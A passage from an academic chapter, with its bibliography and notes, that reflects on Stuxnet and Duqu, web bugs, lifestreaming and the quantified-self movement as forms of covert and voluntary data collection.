**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
